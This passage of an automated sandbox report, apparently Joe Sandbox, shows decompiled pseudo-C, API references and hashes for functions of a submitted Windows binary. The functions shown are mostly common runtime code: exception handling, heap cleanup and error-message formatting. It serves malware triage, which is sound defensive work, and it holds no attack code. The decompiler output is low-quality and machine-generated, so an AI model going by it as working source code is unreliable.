					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x1008018 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x1008018 = _t39;
				}
				_t37 =  !_t36;
				 *0x100801c = _t37;
				return _t37;
			}

0x0100678b
0x0100678f
0x01006793
0x010067a6
0x010067b0
0x010067bc
0x010067c5
0x010067ce
0x010067df
0x010067e6
0x010067f2
0x010067f5
0x010067f9
0x01006803
0x01006808
0x01006808
0x0100680a
0x0100680a
0x01006810
0x01006813
0x0100681c

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 010067B0
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 010067BF
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 010067C8
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 010067D1
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 010067E6

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 5788c3af12dcd73591406211c89d510ad6b899db7012dc9d3a49c3d644a8c4b6
Instruction ID: 39618ce5435dd2d5d1a85ddd57cac3c10d37ce011294b7cafd0de4828c31943e
Opcode Fuzzy Hash: 5788c3af12dcd73591406211c89d510ad6b899db7012dc9d3a49c3d644a8c4b6
Instruction Fuzzy Hash: C8115871E00208ABDF22DBB8D54869EBBF5FF48314F5188AAE445E7244E6368B008B80

Uniqueness

Uniqueness Score: -1.00%

Function 01006232 Relevance: 6.0, APIs: 4, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01006232(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x01006239
0x01006242
0x0100625b

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,01006368,01001000), ref: 01006239
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(01006368,?,01006368,01001000), ref: 01006242
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,01006368,01001000), ref: 0100624D
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,01006368,01001000), ref: 01006254

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 38d78b73f859841f50cdf88cbf07453879080210ab12d571e92de7e2c4793628
Instruction ID: 469c188768a42b380cd16e4d765684a639e6a7941244e4df1fbec69477bd8942
Opcode Fuzzy Hash: 38d78b73f859841f50cdf88cbf07453879080210ab12d571e92de7e2c4793628
Instruction Fuzzy Hash: 97D0C932544104BFDB226BE1E80DA897E28EB4821AF048404F79E82006CB3B54518B61

Uniqueness

Uniqueness Score: -1.00%

Function 01002D7A Relevance: 5.0, APIs: 4, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01002D7A(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						HeapFree(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}

0x01002d7e
0x01002d84
0x01002d8a
0x01002d8e
0x01002d91
0x01002d94
0x01002d9f
0x01002da5
0x01002da8
0x01002dab
0x01002db2
0x01002db6
0x01002db9
0x01002dc4
0x01002dcc
0x01002dcf
0x01002dd4

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01004A4B,?,?,00000000,?,?,?,?,010047C2,?,?), ref: 01002D98
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,010047C2,?,?,?,?,00000000), ref: 01002D9F
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,01004A4B,?,?,00000000,?,?,?,?,010047C2,?,?), ref: 01002DBD
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,010047C2,?,?,?,?,00000000), ref: 01002DC4

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3795fa102c94a948c267991c7a48a364c9b3bb278fb8c54ba42272c5cc79e1c1
Instruction ID: 8a4efd73df32bebcea0a5dbb35b401e60d44051f193b759b6337bf698135a70c
Opcode Fuzzy Hash: 3795fa102c94a948c267991c7a48a364c9b3bb278fb8c54ba42272c5cc79e1c1
Instruction Fuzzy Hash: F7F0AF72210301AFEB25CFA0D888B65B7F8FF44316F11092AF185C6480D775E851CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01002512 Relevance: 4.8, APIs: 3, Instructions: 285threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 010025CB
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 010026A4
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,?,?,?,?,00000002,8007029C), ref: 0100272A

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: 3e43cb30fc3712f31f06e1c958caf3290668cc2587e4a95ad7514c8d1d8336b5
Instruction ID: c3462f70865e53cda22a1543b6ff365f81cf4b1bccf7c1d625369864dc36152c
Opcode Fuzzy Hash: 3e43cb30fc3712f31f06e1c958caf3290668cc2587e4a95ad7514c8d1d8336b5
Instruction Fuzzy Hash: 84A1C271A002159FEB63DF28D8486AF7BE5FF89310F05846EE9CAD3291DB359841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01003590 Relevance: 4.5, APIs: 3, Instructions: 19threadcomCOMMON

Download Yara Rule

APIs

SHSetThreadRef.API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-1(?), ref: 01003599
CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,?,00000001,?,?), ref: 010035AD
SHSetThreadRef.API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-1(00000000), ref: 010035B7

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Thread$CreateInstance
String ID:
API String ID: 3138327727-0
Opcode ID: 4d8d2f7030e4560cf952bbe92a0608c1a356a32c153b93dabd93254db5db48e8
Instruction ID: 0392fe38f229d17d88185cf23e5ac0bf51f8280496aa8d95aca18dbd9a966275
Opcode Fuzzy Hash: 4d8d2f7030e4560cf952bbe92a0608c1a356a32c153b93dabd93254db5db48e8
Instruction Fuzzy Hash: 57E0E232200218BBCF225F91EC0DECA3F26EB487A1F004022FF09861A1C7778961EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 01004C9B Relevance: 3.3, APIs: 2, Instructions: 311
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E01004C9B(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				signed int _t118;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t126;
				signed int _t128;
				signed int _t131;
				signed int _t135;
				intOrPtr* _t140;
				signed int _t146;
				intOrPtr _t148;
				signed int _t153;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t172;
				signed int _t174;
				intOrPtr* _t191;
				signed int _t201;
				signed int _t207;
				signed int _t209;
				signed int _t211;
				void* _t212;
				void* _t213;
				signed int _t215;
				signed int _t220;
				signed int _t224;

				_v8 =  *0x1008018 ^ _t220;
				_t211 = 0;
				_v48 = __ecx;
				_t155 = 0;
				_t160 = 0x1006d5c;
				_v28 = 0;
				_t207 = E0100336A(0x1006d5c, 0x1006d64, __ecx);
				_v40 = _t207;
				_push(4);
				_t224 = _t207;
				if(_t224 == 0) {
					L29:
					_t207 = 0x1006d68;
					_t198 = 0x1006d68;
					_t110 = E0100336A(0x1006d64, 0x1006d68, _t160);
					_t239 = _t110;
					if(_t110 != 0) {
						_push(0x1001300);
						_push(4);
						_t198 = E01006516(_t155, 0x1006d68, _t211, _t239,  ~(0 | _t239 > 0x00000000) | _t110 * 0x01006d68);
						_v12 = _t198;
						if(_t198 == 0) {
							_t155 = 0x8007000e;
						}
						if(_t155 >= 0) {
							_v20 = _t211;
							_v16 = _t211;
							_t156 = _t211;
							asm("sbb edi, edi");
							_t207 =  !_t207 & 3 >> 0x00000002;
							_t118 = 0x1006d68;
							_v36 = 0x1006d68;
							if(_t207 > 0) {
								_t174 = _t211;
								do {
									_t212 =  *_t118;
									if(_t212 != 0) {
										 *0x1009294();
										_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t212 + 4))))();
										_t198 = _v12;
										_t174 = _v16;
										 *((intOrPtr*)(_v12 + _t156 * 4)) = _t126;
										_t156 = _t156 + 1;
										_t118 = _v36;
									}
									_t213 = 4;
									_t118 = _t118 + _t213;
									_t174 = _t174 + 1;
									_v36 = _t118;
									_v16 = _t174;
								} while (_t174 < _t207);
								_t211 = 0;
							}
							_t120 =  *_v48;
							_t248 =  *((intOrPtr*)(_t120 + 0x20)) - E010043E0;
							if( *((intOrPtr*)(_t120 + 0x20)) != E010043E0) {
								_t155 = 0x80004001;
								__imp__RoOriginateError(0x80004001, _t211);
							} else {
								_t155 = E01004FE7(_t198, _t248,  &_v20, _t156);
							}
							if(_t155 >= 0 && _t207 != 0) {
								_t201 = 0x1006d68;
								_t121 = 4;
								do {
									_t172 =  *_t201;
									if(_t172 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0xc)) + 4)) = _v20;
										_t121 = 4;
									}
									_t201 = _t201 + _t121;
									_t211 = _t211 + 1;
								} while (_t211 < _t207);
							}
							_t198 = _v12;
						}
						_push(_t198);
						L01005E27();
					}
				} else {
					_push(0x1001300);
					_t128 = E01006516(0, _t207, 0, _t224,  ~(0 | _t224 > 0x00000000) | _t109 * 0x01006d64);
					_push(0x1001300);
					_v12 = _t128;
					_push(4);
					_t131 = E01006516(0, _t207, 0, _t224,  ~(0 | _t224 > 0x00000000) | _t207 * 0x01006d64);
					_push(0x1001300);
					_v32 = _t131;
					_push(0x10);
					_t160 =  ~(_t224 > 0) | _t207 * 0x01006d64;
					_t198 = E01006516(0, _t207, 0, _t224,  ~(_t224 > 0) | _t207 * 0x01006d64);
					_v36 = _t198;
					if(_v12 == 0) {
						L27:
						_t155 = 0x8007000e;
					} else {
						_t160 = _v32;
						if(_v32 == 0 || _t198 == 0) {
							goto L27;
						} else {
							_t209 = 0x1006d60;
							_v24 = 0;
							_v16 = 0x1006d60;
							_t135 = 0x1006d60;
							if(0x1006d60 >= 0x1006d64) {
								L14:
								if( *((intOrPtr*)( *_v48 + 0x28)) != E01004250) {
									_t155 = E01005103(_t198, _t160, _v12, _v40);
									_v28 = _t155;
									__eflags = _t155;
									if(_t155 >= 0) {
										_v20 = _t211;
										_t198 = _t211;
										__eflags = 0x1006d64 - _t209;
										_v24 = _t198;
										asm("sbb ecx, ecx");
										_t160 =  !0x1006d64 & 0x01006d67 - _t209 >> 0x00000002;
										__eflags = 0x1006d64;
										_v40 = 0x1006d64;
										if(0x1006d64 > 0) {
											_t158 = _v12;
											_t146 = _t211;
											do {
												__eflags =  *_t209;
												if( *_t209 != 0) {
													_t60 =  &_v24;
													 *_t60 = _v24 + 1;
													__eflags =  *_t60;
													_t148 =  *((intOrPtr*)(_t158 + _t198 * 4));
													_t198 = _v24;
													 *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0xc)) + 4)) = _t148;
													_t160 = _v40;
													_t146 = _v20;
												}
												_t209 = _t209 + 4;
												_t146 = _t146 + 1;
												_v20 = _t146;
												__eflags = _t146 - _t160;
											} while (_t146 < _t160);
											_t155 = _v28;
										}
									}
								} else {
									_t155 = 0x80004001;
									__imp__RoOriginateError(0x80004001, _t211);
									_v28 = 0x80004001;
								}
							} else {
								_v20 = _t198;
								while(_t155 >= 0) {
									_t191 =  *_t135;
									if(_t191 != 0) {
										_v52 = 2;
										_v44 = _t211;
										 *0x1009294( &_v52, _t191, 0x1001924,  &_v44);
										_t155 =  *((intOrPtr*)( *_t191))();
										_v28 = _t155;
										if(_t155 >= 0) {
											_t153 = _v24;
											_t198 = _v32;
											 *(_v32 + _t153 * 4) = _v44;
											_v24 = _t153 + 1;
											_v20 = _v20 + 0x10;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
										}
										_t135 = _v16;
										_t211 = 0;
									}
									_t160 = 4;
									_t135 = _t135 + _t160;
									_v16 = _t135;
									if(_t135 < 0x1006d64) {
										continue;
									} else {
										if(_t155 >= 0) {
											_t160 = _v32;
											_t209 = 0x1006d60;
											_t198 = _v36;
											goto L14;
										}
									}
									goto L23;
								}
							}
							L23:
							_t207 = _v24;
							_v40 = _t211;
							if(_t207 != 0) {
								_t157 = _t211;
								do {
									_t140 =  *((intOrPtr*)(_v32 + _t157 * 4));
									_t76 =  *_t140 + 8; // 0x1
									_t215 =  *_t76;
									_t160 = _t215;
									 *0x1009294(_t140);
									 *_t215();
									_t157 = _t157 + 1;
								} while (_t157 < _t207);
								_t155 = _v28;
								_t211 = 0;
							}
						}
					}
					_push(_v12);
					L01005E27();
					_push(_v36);
					L01005E27();
					_push(_v32);
					L01005E27();
					if(_t155 >= 0) {
						goto L29;
					}
				}
				return E01006160(_t155, _t155, _v8 ^ _t220, _t198, _t207, _t211);
			}

0x01004caa
0x01004cb0
0x01004cb2
0x01004cb6
0x01004cbd
0x01004cc2
0x01004cca
0x01004ccc
0x01004ccf
0x01004cd2
0x01004cd4
0x01004ed3
0x01004ed4
0x01004ede
0x01004ee0
0x01004ee5
0x01004ee7
0x01004eed
0x01004ef4
0x01004f06
0x01004f08
0x01004f0f
0x01004f11
0x01004f11
0x01004f18
0x01004f23
0x01004f2b
0x01004f30
0x01004f37
0x01004f3b
0x01004f3d
0x01004f3f
0x01004f42
0x01004f44
0x01004f46
0x01004f46
0x01004f4a
0x01004f51
0x01004f57
0x01004f59
0x01004f5c
0x01004f5f
0x01004f62
0x01004f63
0x01004f63
0x01004f68
0x01004f69
0x01004f6b
0x01004f6c
0x01004f6f
0x01004f72
0x01004f76
0x01004f76
0x01004f7b
0x01004f7d
0x01004f84
0x01004f95
0x01004f9b
0x01004f86
0x01004f90
0x01004f90
0x01004fa3
0x01004fab
0x01004fb0
0x01004fb1
0x01004fb1
0x01004fb5
0x01004fbf
0x01004fc2
0x01004fc2
0x01004fc3
0x01004fc5
0x01004fc6
0x01004fb1
0x01004fca
0x01004fca
0x01004fcd
0x01004fce
0x01004fd3
0x01004cda
0x01004cde
0x01004ceb
0x01004cf0
0x01004cf5
0x01004cfa
0x01004d09
0x01004d0e
0x01004d13
0x01004d18
0x01004d24
0x01004d2f
0x01004d31
0x01004d37
0x01004eab
0x01004eab
0x01004d3d
0x01004d3d
0x01004d42
0x00000000
0x01004d50
0x01004d50
0x01004d55
0x01004d58
0x01004d5b
0x01004d63
0x01004df5
0x01004e01
0x01004e21
0x01004e23
0x01004e26
0x01004e28
0x01004e2f
0x01004e3c
0x01004e3e
0x01004e40
0x01004e43
0x01004e47
0x01004e47
0x01004e49
0x01004e4c
0x01004e4e
0x01004e51
0x01004e53
0x01004e53
0x01004e56
0x01004e5a
0x01004e5a
0x01004e5a
0x01004e60
0x01004e63
0x01004e66
0x01004e69
0x01004e6c
0x01004e6c
0x01004e6f
0x01004e72
0x01004e73
0x01004e76
0x01004e76
0x01004e7a
0x01004e7a
0x01004e4c
0x01004e03
0x01004e04
0x01004e0a
0x01004e10
0x01004e10
0x01004d69
0x01004d69
0x01004d6c
0x01004d74
0x01004d78
0x01004d7d
0x01004d8e
0x01004d96
0x01004d9e
0x01004da0
0x01004da5
0x01004da7
0x01004daa
0x01004db3
0x01004dc1
0x01004dc4
0x01004dca
0x01004dcb
0x01004dcc
0x01004dcd
0x01004dcd
0x01004dce
0x01004dd1
0x01004dd1
0x01004dd5
0x01004dd6
0x01004dd8
0x01004de0
0x00000000
0x01004de2
0x01004de4
0x01004dea
0x01004ded
0x01004df2
0x00000000
0x01004df2
0x01004de4
0x00000000
0x01004de0
0x01004d6c
0x01004e7d
0x01004e7d
0x01004e80
0x01004e85
0x01004e87
0x01004e89
0x01004e8c
0x01004e92
0x01004e92
0x01004e95
0x01004e97
0x01004e9d
0x01004e9f
0x01004ea0
0x01004ea4
0x01004ea7
0x01004ea7
0x01004e85
0x01004d42
0x01004eb0
0x01004eb3
0x01004eb8
0x01004ebb
0x01004ec0
0x01004ec3
0x01004ecd
0x00000000
0x00000000
0x01004ecd
0x01004fe6

APIs

RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80004001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01004E0A
RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80004001,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,01003685), ref: 01004F9B

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ErrorOriginate
String ID:
API String ID: 2737598581-0
Opcode ID: 16744d1611f59b4bb70dd53e7d6a7e94c3b82c8ca1b58bea6904a03607f6a125
Instruction ID: fc84dabcd87ff98913493c02da6361759f61b7d8375cb89342c93e740a60f898
Opcode Fuzzy Hash: 16744d1611f59b4bb70dd53e7d6a7e94c3b82c8ca1b58bea6904a03607f6a125
Instruction Fuzzy Hash: DEA18571F002159FEB16DFA8C9805AEBBF6EF48710F14416EEA85EB390CB719C418B94

Uniqueness

Uniqueness Score: -1.00%

Function 01003D9F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E01003D9F(void* __eax, void* __ecx) {
				char _v8;
				void* _t14;
				signed int _t15;
				signed char _t16;
				void* _t24;
				intOrPtr _t26;

				_t14 = __eax;
				_push(__ecx);
				_t26 =  *[fs:0x30];
				RtlImageNtHeader(__ecx);
				_t24 = _t14;
				if( *((short*)(_t24 + 0x14)) != 0) {
					_t16 =  *(_t24 + 0x4c);
					if(_t16 != 0) {
						 *(_t26 + 0xa4) = _t16 & 0x000000ff;
						 *(_t26 + 0xa8) =  *(_t24 + 0x4d) & 0x000000ff;
						 *((short*)(_t26 + 0xac)) =  *((intOrPtr*)(_t24 + 0x4e));
						 *(_t26 + 0xb0) = ( *(_t24 + 0x4c) ^ 0xbfffffff) >> 0x1e;
					}
				}
				_t15 =  &_v8;
				__imp__ImageDirectoryEntryToData( *((intOrPtr*)(_t26 + 8)), 1, 0xa, _t15);
				if(_t15 != 0) {
					_t15 =  *(_t15 + 0x34) & 0x0000ffff;
					if(_t15 != 0) {
						 *(_t26 + 0xae) = _t15;
					}
				}
				return _t15;
			}

0x01003d9f
0x01003da4
0x01003da6
0x01003dae
0x01003db4
0x01003dbb
0x01003dbd
0x01003dc2
0x01003dc7
0x01003dd1
0x01003ddb
0x01003ded
0x01003ded
0x01003dc2
0x01003df3
0x01003dfe
0x01003e06
0x01003e08
0x01003e0f
0x01003e11
0x01003e11
0x01003e0f
0x01003e1c

APIs

RtlImageNtHeader.NTDLL ref: 01003DAE
ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,?), ref: 01003DFE

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Image$DataDirectoryEntryHeader
String ID:
API String ID: 3478907836-0
Opcode ID: 72cf540624293f5ed4e6fdae7aa683f7d5616ecdcca5092b1c040c674f629fc0
Instruction ID: 284cc026db6a3d84177589d616159d8d896dfdcfe4394271fff902cc7c512dfe
Opcode Fuzzy Hash: 72cf540624293f5ed4e6fdae7aa683f7d5616ecdcca5092b1c040c674f629fc0
Instruction Fuzzy Hash: 020184356103559FE7629F29D4047A3BBE8FF0A700F04059EA5DADB2C1E775E980C791

Uniqueness

Uniqueness Score: -1.00%

Function 010020D6 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E010020D6(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_v8 =  *0x1008018 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E01006160(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x10083dc;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x10083e8 == 0) {
						L5:
						_v524 = 0x100161c;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E01002080();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E01002080(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E01002080(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E01002080(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E01002080();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E01002080(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E01002080(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E01002080();
								} else {
									E01002080(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E01002080(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x1009294(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}

0x010020d6
0x010020e8
0x010020ee
0x010020f0
0x010020f7
0x010020fc
0x010022cf
0x010022e0
0x0100210a
0x0100210a
0x0100210b
0x01002113
0x01002118
0x0100213b
0x0100213f
0x01002149
0x0100214b
0x01002180
0x0100214d
0x0100214d
0x01002150
0x01002174
0x01002152
0x01002152
0x01002155
0x01002168
0x01002157
0x0100215a
0x0100215c
0x0100215c
0x0100215a
0x01002155
0x01002150
0x01002192
0x010021ae
0x010021be
0x010021c1
0x010021c4
0x010021c7
0x010021e0
0x010021e5
0x010021e6
0x010021e7
0x010021ec
0x010021c9
0x010021c9
0x010021d6
0x010021db
0x010021db
0x010021f3
0x010021f5
0x01002201
0x01002206
0x01002209
0x01002209
0x01002211
0x01002212
0x0100221b
0x0100221c
0x0100222c
0x01002233
0x01002239
0x01002249
0x0100224e
0x0100224f
0x01002250
0x01002255
0x0100225c
0x01002268
0x0100226d
0x0100226d
0x01002274
0x01002280
0x01002285
0x01002285
0x0100228c
0x010022a9
0x010022bf
